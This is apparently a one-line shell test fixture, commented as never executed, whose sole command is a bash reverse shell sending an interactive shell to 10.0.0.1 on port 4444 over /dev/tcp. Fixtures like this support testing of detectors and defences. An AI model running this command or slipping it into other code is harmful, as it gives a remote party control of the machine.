#!/bin/sh # Reverse shell test fixture — never executed. bash -i >& /dev/tcp/10.0.0.1/4444 0>&1